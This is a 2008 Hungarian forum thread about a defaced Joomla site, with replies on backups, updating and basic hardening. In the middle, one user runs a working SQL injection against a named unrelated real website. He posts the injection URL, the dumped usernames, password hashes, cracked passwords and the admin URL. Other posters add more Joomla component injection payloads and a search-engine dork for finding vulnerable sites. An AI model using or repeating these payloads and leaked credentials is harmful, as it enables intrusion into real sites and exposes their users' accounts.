Sziszatok!
Feltörték a honlapomat, ami a dataglobe-nál volt tárolva. Ott azt mondták, hogy valami robot hajtotta végre a tettet, és a honlap adminisztrációs felületén jutottak be, nekik ehhez semmi közük nincs, nem is végeznek biztonsági mentést a honlaptartalomról, igy visszaállitani sem tudják.
Szerintetek korrekt ez igy?
Tényleg nem végeznek a szolgáltatók időszakos mentéseket, vagy csak a dataglobe ilyen amatőr?
A másik, hogy miként lehet védekezni hasonló próbálkozások ellen? A honlapon joomla alapú volt, mivel az ingyenes. Tehát ftp kapcsolaton törik inkább fel, vagy magán, a honlapon keresztül? Megelőzési módja van-e ennek szerintetek? Ubuntu alatt dolgozom, szerintem kicsi az esélye annak, hogy a jelszót az én gépemről lopták volna el, de semmi nem kizárt. Hogyan lehet ennek utánanézni?
köszönettel.
- 8919 megtekintés
Hozzászólások
99% hogy a joomla -t húzták meg... elég gyakran jönnek ki biztonsági hibák benne
- A hozzászóláshoz be kell jelentkezni
Védekezni úgy lehet hogy ha van saját szervered, amit beviszel egy adatparkba.
Vagy backupolsz saját magadnak.
Amatőrség mentés nélkül hagyni az adatokat, te is lementhetted volna bármikor, a céges gépedre.
SQl táblát sem nagy wasistdas lementeni időnként
- A hozzászóláshoz be kell jelentkezni
a sajat szerver az adatparkban ved a joomla hibak ellen? wtf?
- A hozzászóláshoz be kell jelentkezni
Nem az volt a prombélma, hogy még backup sem volt????????????????????
Szerintem de.
- A hozzászóláshoz be kell jelentkezni
Természetesen lementettem a tartalmat a saját gépemre és már vissza is töltöttem azóta.
Csak magától értetődőnek gondoltam volna, hogy a szolgáltató is menti a nála elhelyezett honlaptartalmakat.
Szóval a joomla a hibás? Akkor nem marad más hátra, mint rendszeres backup és visszamásolás, ha baj van.
- A hozzászóláshoz be kell jelentkezni
+ frissítés ;)
- A hozzászóláshoz be kell jelentkezni
Jo, nezzuk azt az esetet, ha elhasal valami a szerverben...
Akkor mit csinál a delikvens szolgáltató?
-Áhh, bocs faszikám, felnyomták az oldaladat.
És ezt elmondja az összes ügyfélnek.
kötöjelkötöjel
//:wladek's world
- A hozzászóláshoz be kell jelentkezni
Már miért mentené? Az céges és bizalmas adat.
- A hozzászóláshoz be kell jelentkezni
mennyire lehet az bizalmas ha náluk van?
nem mindegy hogy csak a szerverükö van vagy még egy mentésen is?
- A hozzászóláshoz be kell jelentkezni
Egy magara valamit ado adatpark legalabb hetente keszit szalagos mentest, az igaz, hogy ilyen esetben azok viszaa'llitasa koltseges, ezert ha nem az ok hibajukbol kell viszaa'llitani akor azt kulon kell fizetned!
_______________________________________________________
UBUNTU 7.10 Rock's!
Type cat vmlinuz > /dev/audio to hear the Voice of God.
- A hozzászóláshoz be kell jelentkezni
Backup van hw hiba esetére biztos. vagy raid. de gondolom az külön extra, hogy mittomén x időpontra visszamenőleg visszaállítható legyen. Nem túl nehéz megcsinálni szerver szinten, pl. rsback al. De énis csak extraként vállalnám, ha hostingolnék, vagy a visszaállítást legalábbis megfizettetném.
- A hozzászóláshoz be kell jelentkezni
A csomag tartalmazza még:
ingyenes DNS szolgáltatás
időzített PHP futtatási lehetőség
korlátlan PHP használat
korlátlan MySQL használat
korlátlan számú MySQL adatbázis
korlátlan E-mail postafiók
korlátlan számú FTP hozzáférés
korlátlan adatforgalom
látogatottsági statisztika
webmail levelező felület
phpMyAdmin használat
vírusos és SPAM levelek szűrése
RAID mirror adattárolás
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rendszeres napi adatmentés (backup)<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
99%-os rendelkezésre állás
100 Mbit/s belföldi sávszélesség
1 Mbit/s külföldi sávszélesség
telefonos ügyfélszolgálat
- A hozzászóláshoz be kell jelentkezni
Eléggé hihetetlennek tűnik, hogy nem volt biztonsági mentés.
Ha nem volt, akkor én nem sokáig maradnék ilyen helyen...
kötöjelkötöjel
//:wladek's world
- A hozzászóláshoz be kell jelentkezni
Érdekes, mert a honlapon a "csomagjaink tartalmazzák még" alatt ott van a napi backup... Bár a szerződést kéne látni, hogy abba mi került bele.
- A hozzászóláshoz be kell jelentkezni
embeer... :) részvétem...
ha újrateszed az oldalt, használd mondjuk a jomBackup system plugin mambotot.
innen letöltheted:
http://extensions.joomla.org/component/option,com_mtree/task,viewlink/l…
tök egyszerű kis kütyü, naponta egyszer, éjféltájt elküldi egy megadott emailcímre az sql mentést.
még a kisujjadat sem kell mozdítanod, és máris van nem egy, hanem több száz sql mentésed....
én használom :)
--
dont_worry_be_happy
- A hozzászóláshoz be kell jelentkezni
MOst ne haragudj, de ezt te cseszted el.
Nem volt feltűnő, hogy 1Gb tárhelyed minden extra szolgáltatással csak 990Ft-ért adnak?
Csak gondolj bele, hogy egy jó szerver min. 500-xxxxeFt + hozzáértő személyzet 200e-xxxeFt/fő és ezer forintos hiper olcsó tárhelyből ezekre nem futja.
Amennyit fizettél olyan szolgáltatást kaptál!
- A hozzászóláshoz be kell jelentkezni
Nezzuk...
BackUP: no comment...
Joomla:
2008-02-14:
- http://milw0rm.com/exploits/5120
- http://milw0rm.com/exploits/5119
- http://milw0rm.com/exploits/5118
- http://milw0rm.com/exploits/5117
Ebben ahonapban: 14 exploit jott ki hozza...Nagyjabol mind SQL injection... Nemhinnem, hogy bot es nemhinnem, hoyg az adminon keresztul... Valoszinuleg kijott a hiba... Googleztak es talaltak... meghozza teged is... A Google nagyon szepen megmondja, ha jol kerdezel...
google: powred.by.joobla
kb aztan melleirsz 3 szot hogy miylen stilusu lap legyen =)
Vedekezes:
- Nem hazsnalsz ilyen durvan lyukas rendszert... Ugyanis joomla az egyik legsebezhetobb...
- Atirsz neany konytarat... torlod a nyomait, hogy ez joomla ^_^ akkor nehezebben talalnak hozza exploitot...
--
by lightgod
- A hozzászóláshoz be kell jelentkezni
Ezt is ilyen könnyen törnéd?: penguinclickers.3chq.org
Ez egy "hobby site"-om, de érdeklõdés hiján elég döglött, úgyhogy próbálkozhatsz nyugodtan, ha kell a kihivás. (A "meghivás" csak erre a portálra és CMS-re vonatkozik, az egész szerverre nem, mert az nem az enyém).
Amúgy Dragonfly CMS, ami ugye szintén "konzerv CMS", de még a menüre sem került fel az év CMS-e szavazáson itt a HUP-on...
---
Mondjon le!
- A hozzászóláshoz be kell jelentkezni
Firefox 3-al nem is enged be az oldal. =D
- A hozzászóláshoz be kell jelentkezni
Most nézd meg; feloldottam az "Unknown User-Agent" tiltását.
---
Mondjon le!
- A hozzászóláshoz be kell jelentkezni
Sry... de majd ha nagyon sok idom lesz utananezek ^_^ egyenlore sok a munkam...
--
by lightgod
- A hozzászóláshoz be kell jelentkezni
Baszki, komolyan fel nem foghatom, hogy hogyan lehet 2008-ban SQL injekcióval feltörni egy magára a valamit is adó honlapmotort???
Nem néztem meg a Joomla forráskódját, de ez így nagyon gáz.
Főleg, hogy pofonegyszerűen lehet ellene védekezni.
- A hozzászóláshoz be kell jelentkezni
Úgy, hogy sok a péhápéokostojás, aki le bír három sort írni, meg látott már sql-t, és ontják magukból a sz...rabbnál sz..abb "kódot"...
az a baj, hogy "péhápébenmegeskúelben" tudnak kódot írni, normálisan programozni viszont -- tisztelet a szűk kivételnek -- nem. Jellemző példaként azt szoktam felhozni, hogy egy "ls -lrt" kimenetet kellett volna html-táblázatként produkálni php-ben a gyerkőcnek, mire mit csinált? Meghívta az ls-t, a form-ban megadott paramétert direktben odaadva a shell parancsnak... Pedig ő már sokt programozott php-ben...
- A hozzászóláshoz be kell jelentkezni
vagy egy masik nagyon ari: kereso = system() vagy popen("grep akarmi *.txt")...
ASK Me No Questions, I'll Tell You No Lies
- A hozzászóláshoz be kell jelentkezni
Bocs, de ezen hatalmasat röhögtem :D
- A hozzászóláshoz be kell jelentkezni
Ilyen a cég. A szolgáltatási szerződésben ott van hogy Te mentesz adatot. Olcsó húsnak híg a leve...
- A hozzászóláshoz be kell jelentkezni
http://greenleafwholesale.com/index.php?
option=com_quiz&
task=user_tst_shw&
Itemid=55&
tid=1/**/union/**/select/**/0,
concat(username,0x3a,password),
concat(username,0x3a,password)
/**/from/**/mos_users/*
5 perc google volt... es milw0rm.com ... ennyi...
aztan:
asheflin:f164d5ff6ecefb3bb995e1c145dd9aca
williee:fd820a2b4461bddd116c1518bc4b0f77
gwiltjer:f164d5ff6ecefb3bb995e1c145dd9aca
rirons:f164d5ff6ecefb3bb995e1c145dd9aca
asheflin - trythis1
williee - william
gwiltjer - trythis1
rirons - trythis1
rolando:15f1a49bb12bccf9af12409289c9cd37
15f1a49bb12bccf9af12409289c9cd37 -> trythis1
http://greenleafwholesale.com/administrator/
http://hippy.csoma.elte.hu/~lightgod/screenshot-20080215192557.png
a milw0rm.com-on vannak exploitok es van md5 hash adatbazisa is... onnan tudni a jelszot... admin-e nincs benne =/ ^_^
max 10 perces munka volt et megcsinalni... de MAX 10 perc
Ennyit a joomle-rol
Nem egy nagy was ist das... Ezek meg csak hekkerek se voltak...
--
by lightgod
- A hozzászóláshoz be kell jelentkezni
Hát ez ijesztő!!
Nem nagyon értem, amit irsz, pláne az exploitokat, de a végeredmény az megdöbbentő...
Ez akkor kivédhetetlen.
Marad a backup.
- A hozzászóláshoz be kell jelentkezni
Én valami más cms-t javasolnék...ez gondolom nem jelent problémát, rengeteg ingyenes alternatíva van...
kötöjelkötöjel
//:wladek's world
- A hozzászóláshoz be kell jelentkezni
nem eleg egyszer feltenni, neha frissiteni is kell szerencsetlen joomla-t.
akarmilyen cms-t is teszel fol, a sajat hulyesegedtol nem fog megvedeni onmagaban.
t
- A hozzászóláshoz be kell jelentkezni
A legujabb Joomlaban is oylan hiba van, hogy egyszeruen nem hoszem el... URL-ben ID-nal sql injection... egyszeruen ne hiszem el... Nah midnegy...
Masik CMS ajanlott =)
amugy meg... Kivedheto viszonylag
megkeresed az osszes Joomla! szoot... kicsereled monnyuk Drupalra... aztan neszeb+... Drupal exploit nemmegy rajta... es nem sokan fogjak feltetelezni, hoyg jooomla ^_^ csak aki tenyleg beleassa magat a paraeterezesbe elrendezesbe forras stilusaba...
--
by lightgod
- A hozzászóláshoz be kell jelentkezni
index.php?option=com_smslist&Itemid=99999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
most kaptam :)
t
- A hozzászóláshoz be kell jelentkezni
Mi?
kitol kaptad?
igen en is beirtam valami hasonlot a peldaba ^_^
Comment: azert tenyleg fajo, hogy enniy ido fejlesztes utan meg iylen hiba van benne... ami ennyire brutalis...
--
by lightgod
- A hozzászóláshoz be kell jelentkezni
azert tenyleg fajo, hogy enniy ido fejlesztes utan meg iylen hiba van benne... ami ennyire brutalis...
Szerintem még eléggé hordozza a régi nyűgöket.
-----
"Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben."
- A hozzászóláshoz be kell jelentkezni
index.php?option=com_activities&Itemid=51&func=detail&id=-1/**/union/**/select/**/0,1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,username/**/from/**/mos_users/*
itt megegy
t
- A hozzászóláshoz be kell jelentkezni
A mod_security nem szűri ki az ilyen próbálkozásokat?
Ahogy látom a táblák elején a jos_ prefix módosítása is egy védelem az egyszerűbb támadások ellen.
...
Azaz gyakorlatilag ezek nem jelentenek komoly veszélyt egy jól beállított szerveren.
Nem vagyok túl jártas a témába, azaz javítsatok ki ha nincs igazam, ill. szívesen vennék pár ötletet, hogy lehet védekezni a hasonló SQL injection ellen. (Nyilván más cms-nél is vannak hasonló hibák, azaz nem cms-t szeretnék váltani, hanem csökkenteni a kockázatát annak, hogy az én oldalamat is felnyomják.)
Ettől függetlenül számomra is kiábrándító, hogy ennyi hiba van a joomlaba. Főleg hogy használom is, mert funkcionalitása, kezelhetősége, ... szerintem jobb, mint a többi hasonló cms.
- A hozzászóláshoz be kell jelentkezni
A mod security azokat szűri ki amikre megtanítod. De olyat is csinálhatsz, hogy keresel egy olyan .php-t ami mindenhova includeolva van és oda berkasz egy url szűrőt, ami szűri, hogy sql parancsokat meg javascriptet nem lehessen beszúrni url-be.
- A hozzászóláshoz be kell jelentkezni
"megkeresed az osszes Joomla! szoot... kicsereled monnyuk Drupalra... aztan neszeb+... Drupal exploit nemmegy rajta... es nem sokan fogjak feltetelezni, hoyg jooomla ^_^ csak aki tenyleg beleassa magat a paraeterezesbe elrendezesbe forras stilusaba..."
hát ez elég lol
imho egy joomla oldalról ordít h mi a mögötte lévő cms
- A hozzászóláshoz be kell jelentkezni
Az igaz, DE a google nem dobja ki egybol, hogy "Tessek en tamadhato vagyok"... Tehat a hobbyf@$zagok ellen ved, aki lattya hogy kijott explot es akkor "probaljuk ki, mert a wicces es akor majd igazi cracker leszek, mertmegtortem egy oldalt..."
Szal ertelme van... Persze ha meg akarja valaki olni ugyis megoli, ha ert hozza...
--
by lightgod
- A hozzászóláshoz be kell jelentkezni
erre csak idézni tudom az egyik korábbi hozzászólót (kz86):
"Az átnevezés kb szart sem ér, mert nem úgy találják meg ezeket az oldalakat, hogy google-ba beírják, hogy joomla, hanem így:
inurl:com_akármi"
és ez igaz is. normál esetben nem a "powered by akármi" stb -re keresnek, hanem a már link alapján felfedezhető cms -re v ezáltal akár a kapásból detektálható sérülékeny modulokra...
erre gondoltam én is. szóval az említett módszer inkább csak ál védelem érzetet ad, ellenben a haszna nem túl sok...
- A hozzászóláshoz be kell jelentkezni
Ez igaz... En is igy tettem ^_^
De tul sokat nem lehet ellene tenni programozoi tudas nelkul...
--
by lightgod
- A hozzászóláshoz be kell jelentkezni
azert az igazsaghoz hozzatartozik, hogy ezek egyike sem Joomla! bug, hanem valaki altal megirt komponens. Ettol fuggetlenul vannak a Joomla!ban is hibak.
- A hozzászóláshoz be kell jelentkezni
A joomla honlajan viszonylag friss lista talalhato, hogy melyik bovitmenyek jelentenek biztonsagi kockazatot. Aki minden szart felpakol az meg is erdemli. Az meg egy masik kerdes, hogy miert nem vezetnek be egy egyszeru "minosgebiztositasi rendszert".
- A hozzászóláshoz be kell jelentkezni
Csak az alap Joomla csomag van fent (1.5 beta).
- A hozzászóláshoz be kell jelentkezni
Ebben az esetben ne csodalkozzal hogy felnyomtak.
Az utolso beta 2007 Majusban jott ki. Mar a stable verziobol is adtak ki uj kiadast amiben 2 secure bugot is javitottak. jelenleg a 1.5.1 tartanak.
- A hozzászóláshoz be kell jelentkezni
Szervusz !
Azzal kezdeném, hogy 2-3 éve összesen 3 alkalommal törték fel az otthoni ADSL-es "szerveremet", igaz, akkor még Mandrake 8.2 ment, biztonsági frissítések nélkül.
Részben utalok az egyik mai fórumtémára -a particionálásra-, nálam a / partició max 4 GB, ha külön particióra tudom tenni a /home és/vagy a /var könyvtárakat. Szerencsére a Mandrake alatt sem volt 8 GB-nél nagyobb a teljes linux partició, így annak idején dd -vel kiírtam image állományba, és a későbbiekben elemeztem a behatolási nyomokat. (443-as port - ssl-en keresztül törtek be puffer túlcsordulásos technikával). A syslogot kikapcsolta az intruder, ill visszamenőleg is kitörölt fontos sorokat; de a megmaradt nyomok alapján részben tárolóhelyeket kerestem fel, és töltöttem le exploitokat, részben utánaolvastam a témának.
Jelenleg Debianon megy a webszerver, és eddig még nem vettem észre behatolást. Próbálkozást annál többet.
A biztonsági mentési stratégiám az olyan, hogy van napi mentés, ill óránkénti mentés, részben helyben tárolva, részben távoli külső szerverre feltöltve. Ez alapvető. A távoli mentés esetében értelemszerűen a mentendő adatmennyiség és a rendelkezésre álló sávszélesség a meghatározó.
A szolgáltató mentési kötelezettsége az aláírt szerződéstől függ konkrétan, de ha csak a hirdetésben szerepelt az általad használt csomaghoz és a szerződésbe nem került bele, akkor is lehet emlegetni a Gazdasági Versenyhivatalt és a Fogyasztóvédő Felügyeletet.
Milyen gyakorisággal és milyen módoan (manuálisan vagy automatikusan) történik a csomagok update-elése - frissítése?
Ha ismétlődne újabb betörés, akkor előbb mentsd le image állományba a rendszert, és csak utána állítsd vissza az eredeti állapotot!
CSZ
- A hozzászóláshoz be kell jelentkezni
Köszönöm, ez olyan alapos volt, mintha egy orvosdoktor irta volna :)
Én Ubuntu-t használok automatikus frissitéssel. Nem szerverként, hanem csak egy sima desktopként működik a gépem. A fent leirtak alapján számomra egyértelműnek tűnik, hogy nem a gépemről jutottak be a honlapra (hacsak nem a Firefoxban van valami bug), hanem a password nem volt túlzottan sok karakeres, és egyszerű volt kikódolni. A Joomla 1.5-ös változatát használom (beta).
- A hozzászóláshoz be kell jelentkezni
Szerintem a Joomla! egy teljesen jó CMS, csak 1-2 dolgot kell megjegyezni és alkalmazni:
- táblák előtagját megváltoztatni
- ha lehet könyvtárak neveit megváltoztatni, főként az adminét
- csak megbízható theme-ket/modulokat/extension-öket használni, mivel általában ezekben van a hiba
- összes joomla szót eltávolítani
- egy ilyet használni: http://extensions.joomla.org/index.php?option=com_mtree&task=listcats&c…
- menteni, menteni és menteni!
- jah és talán olyan szolgáltatót választani ami nem csak mondja hanem csinálja is a mentést!
- A hozzászóláshoz be kell jelentkezni
Ha tele van sechole-okkal, akkor nem jó rendszer, akkor se, ha átnevezésekkel reménykedhetsz abban, hogy nem jönnek rá, mit kell feltörni.
- A hozzászóláshoz be kell jelentkezni
Az átnevezés kb szart sem ér, mert nem úgy találják meg ezeket az oldalakat, hogy google-ba beírják, hogy joomla, hanem így:
inurl:com_akármi
Meg magyarázd már meg ezeket az átlag felhasználóknak, mert nagyon sokszor ilyenek használnak ingyenes cms-eket. Ezért kéne úgy megírni, hogy ha átlag ember használja akkor is biztonságos legyen.
- A hozzászóláshoz be kell jelentkezni
Évek óta a dataglobe ügyfele vagyok, alap csomagom van. Természetesen archiválják /naponta/ az adatbázisokat, ezt tartalmazza az alapcsomag díja is. Nekem eddig 3x törték fel az oldalaimat saját hibámból: frissíteni kellett volna. Jelszavaidat ne tárold a gépen és ha lehet live CD-ről adminisztrálj, bankolj!
- A hozzászóláshoz be kell jelentkezni
De ahogy látom azért mégsem "archiválják /naponta/" mindenkiét, mert akkor most nem lenne probléma. :D
- A hozzászóláshoz be kell jelentkezni
Az adatbázist archiválják, csak a honlaptartalmat nem.
- A hozzászóláshoz be kell jelentkezni
Megint eltűnt a honlapom tartalma és a hacked by snake1095 felirattal szembesülök. Kezd idegesitő lenni a dolog.Mi történik itt?
- A hozzászóláshoz be kell jelentkezni
szerinted ha visszatöltöd ugyan azt a változatot amit korábban meghúztak akkor az nem lesz ismét sérülékeny?
- A hozzászóláshoz be kell jelentkezni
Egyfelől megváltoztattam minden jelszót, másfelől meg valósznűtlennek tartom, hogy 24 órán belül kétszer is megtalálnak.
- A hozzászóláshoz be kell jelentkezni
szintén 99% hogy nem a jelszavadat fejtették meg, hanem egy biztonsági sérülékenységet haszáltak ki.
hiába változatatod meg a jelszavakat, attól a hiba még ott marad -> frissíteni kell!
- A hozzászóláshoz be kell jelentkezni
Kitalalhatjuk az oldaladat?
.com-ra vegzodik es jarmuvel foglalkozik?? ;)
- A hozzászóláshoz be kell jelentkezni
Nem titok: www.alvasdiagnosztika.com
Nem az, amire gondoltál :)
- A hozzászóláshoz be kell jelentkezni
*pkocsik.com ezt az oldalt is felnyomtak
"This Site Has Been hacked By. ][ SnakE1095 ][ .. Sorry Dude ... .. But U have Bad Security"
ha tudni szeretnekd a oldal a kove IP szamont viseli : 87.229.73.78 segitek a 87.229.73.78 resolves to x78.dataglobe.hu
Lehet h a szolginal van valami??? :D
- A hozzászóláshoz be kell jelentkezni
Tegyél http auth-ot mindegyik mappába. Pl:
AuthUserFile /xxxx/xxx/xx/.htpasswd
AuthType Basic
AuthName "Admin"
<Limit GET POST PUT>
require user xxx
</Limit>
Az images-be viszont ezt kellene rakni:
<Limit POST PUT>
require user xxx
</Limit>
- A hozzászóláshoz be kell jelentkezni
Sajna a hozzáértésem meglehetősen csekély, úgyhogy bocs az okvetetlenkedésért.
Nálam ilyen mappák vannak, hogy: administrator, cache, components, images, stb.
Mindegyik mappa alatt indexfile-k is vannak, abba irjam be vagy új file-t nyissak?
- A hozzászóláshoz be kell jelentkezni
Nem kell mindegyikhez, csak ezekbe amiket írtál.
Persze ez csak ideiglenes megoldás kellene, hogy legyen.
Küldd el valamilyen elérhetőségedet az asci (kukac) vipmail pont hu címre és szívesen segítek.
- A hozzászóláshoz be kell jelentkezni
Udv,
en is joomlat hasznalok tobb mint 30 sitehoz, eddig 2ot tortek fel torok egyenek.
Mindkettonel az en hanyagsagom volt az oka, mivel nem frisitettem oket.
Azt kovetoen mindig a legujabbat teszem. (termeszetesen az 1.0.x verziokrol van szo, az 1.5-nek nincs egy honapja, hogy kijott a Stable verzioja, de ez meg messzemenoen nem annyira biztonsagos mint az 1.0 utobbi verzioja )
Eleg amator hosting lehet az aki nem keszit napi backupot, ajanlom, hogy mihamarabb csereld le oket.
Jelenleg az 1.0.14-et hasznalom es nagyon meg vagyok elegedve vele, az 1.0.12 utan teljes gozzel ataltak az 1.5 fejlesztesere, u.h. az 1.0-nal ez utan mar csak security updatek varhatoak.
Egy nagyon nagy biztonsagi hibat sajnos nem lehet elkerulni, az emberi tenyezot, az egyszeru admin jelszok miatt sok webmesternek fajhat a feje. Az eszem neha megall mikor az ugyfelek ien jelszavakat adnak meg a SuperAdmin usernek, hogy: 123456 vagy qwerty!
Ez ellen en egy jelszo komplexitasat figyelo kis scriptel bovitettem a joomla user osztalyat.
administrator/components/com_users/admin.user.php
43 if ( $_VERSION->RESTRICT == 1 ) {
mosRedirect( 'index2.php?mosmsg=Functionality Restricted' );
} else {
46 //Ide a password komplexitasat ellenorzo szkriptet
if (chkPassword())
saveUser( $task );
else
mosRedirect( 'index2.php?mosmsg=Password for user to simple!' );
}
_______________________________________________________
UBUNTU 7.10 Rock's!
Type cat vmlinuz > /dev/audio to hear the Voice of God.
- A hozzászóláshoz be kell jelentkezni
Nálam egy (super)user pw van mindössze, amit egyedül én használok és tegnap változtattam meg (13 karakteres, kisbetű-nagybetű + szám). Tehát itt nem lehet a baj.
Érdemes downgrade-elni 1.0.14-es verzióra? Nem fog megváltozni a honlaptartalom?
- A hozzászóláshoz be kell jelentkezni
Az erős jelszó csak az ellen véd, hogy ne tudják visszafejteni, de ettől még ugyanúgy szerezhetnek hozzáférést az admin felülethez. sql-el be is szúrhatnak új admin felhasználót, nem csak a meglévő adatait tudják lekérdezni.
- A hozzászóláshoz be kell jelentkezni
"Egy nagyon nagy biztonsagi hibat sajnos nem lehet elkerulni, az emberi tenyezot"
Olvasd vegig meg 1xer figyelmesebben. Nem azt montam, hogy mas modja nincs, nagyon is tisztaban vagyok vele, hogy van es amint emlitettem mar szanvedtem is miatta.
Tisztaban vagyok vele de az 1.0-as verzio mar par eve letezik es nagyon sok biztonsagi res be van tomkodve rajta, nem lehetetlen de a core-ban mar nem nagyon talalsz olyan biztonsagi hibat amin keresztul feltorhetnek az oldalt. Az mas, hogy mien komponenseket telepitesz meg melle!!! Lehet jo a core ha van egy be'na komponensed telepitve!
_______________________________________________________
UBUNTU 7.10 Rock's!
Type cat vmlinuz > /dev/audio to hear the Voice of God.
- A hozzászóláshoz be kell jelentkezni
Az 1.0.x verziot lehet upgradelni 1.5-re eleg konyen, de downgradelni csak manualisan
_______________________________________________________
UBUNTU 7.10 Rock's!
Type cat vmlinuz > /dev/audio to hear the Voice of God.
- A hozzászóláshoz be kell jelentkezni
Hogyan lehet visszamenni 1.5-ről 1.0.14-re?
- A hozzászóláshoz be kell jelentkezni
helyesírási huba:
Password for user TOO simple!
- A hozzászóláshoz be kell jelentkezni
Kosz a kiigazitast, kulon ide keszitettem el a rovid kodjegyzetet, mivel en tobbet modositottam a joomla userkezelesen. Megesik, hogy erre nem figyelek, igaz semmi lenyege annak a szovegnek, oda mindenki azt ir amit akar.
_______________________________________________________
UBUNTU 7.10 Rock's!
Type cat vmlinuz > /dev/audio to hear the Voice of God.
- A hozzászóláshoz be kell jelentkezni
"Ubuntu alatt dolgozom, szerintem kicsi az esélye annak, hogy a jelszót az én gépemről lopták volna el, de semmi nem kizárt"
Ha ftp-t használsz, akkor vess magadra...
- A hozzászóláshoz be kell jelentkezni
Nekem is feltörték az oldalam ami szintén a dataglobenál van. Igaz nagyon régen rá se néztem be se volt fejezve meg ilyesmi, valamelyik 1.0.x-es Joomla volt rajta. Szerencsére azt az aldomaint nem törték fel amin éles dolog is volt, igaz az nem Joomla alapon, de feltörték az öcsémnek meg az unokatesómnak létrehozott aldomain-t, amik nem Joomlával üzemeltek.
Szóval most cserélem a jelszavakat meg asszem a Joomlát is.
- A hozzászóláshoz be kell jelentkezni
Ezek a honlapfeltörések, csak alibi szövegek. Desktop cuccokat használnak, teljesen dilettáns rendszergazdákkal; semmi adatmentés vagy RAID. Aztán ha adatvesztés van akkor nincs miről visszaállítani.
- A hozzászóláshoz be kell jelentkezni
+1..
Én alapból valami komolyabb CMS-t tennék fel és voálá.. na meg jobban kéne ügyelni biztonságra. Nem hinném hogy napi backup nélkül nem lehetne átvészelni. Másrészről.. Csak úgy nem törnek fel egy weblapot..ok nélkül.. (Pl senki nem akarna valami hülye fanclub oldalt feltörni..szerintem)
- A hozzászóláshoz be kell jelentkezni
Dehogynem, ha sokan regisztráltak rá, akkor pl email címek meg jalszavak miatt.
- A hozzászóláshoz be kell jelentkezni
Akkor viszont az oldal tulajdonosának lehetne annyi esze hogy erős védelmű CMS-t használ, gyakran frissíti, kézzel foltozgatja és így tovább...bár a felelőtlenség mindig is az ember egyik főbb "erénye" marad.
- A hozzászóláshoz be kell jelentkezni
Inkább a hozzáértés hiánya, mint a hardver minősége az oka ennek.
Most láttam egy olyan szolgáltatót, aki a főoldalán az index.php fájlban ajánlja fel a jelszóváltoztatást, míg az index.html a főoldal.
Erősen gyanítom, hogy shell_exec() használatával.
kötöjelkötöjel
//:wladek's world
- A hozzászóláshoz be kell jelentkezni
Ez a jelenség kisértetiesen hasonlít arra a jelenségre, ami kétszer is előfordult a ma már ex szolgáltatómnál. (Dataglobe-al egy kategóriás "occsóhosting".) A történés az volt, hogy valamelyik kiváló ügyfele valami exploitolható szart üzemeltetett, abból aztán szépen bemászott és vírus módjára megfertőzte az összes PHP fájlt. Ezek után én mondtam meg nekik, hogy kell a PHP-t félig tisztességesen beállítani.
Sajnos az ilyesmi ellen a jelszóváltás nem segít, főleg hogy nem is nálad van a hiba. Keress tisztességes szolgáltatót vagy üzemeltess saját szervert. Én személy szerint a saját szerver mellett döntöttem és annak ellenére, hogy foglalkozni kell vele nem keveset, nem bántam meg.
- A hozzászóláshoz be kell jelentkezni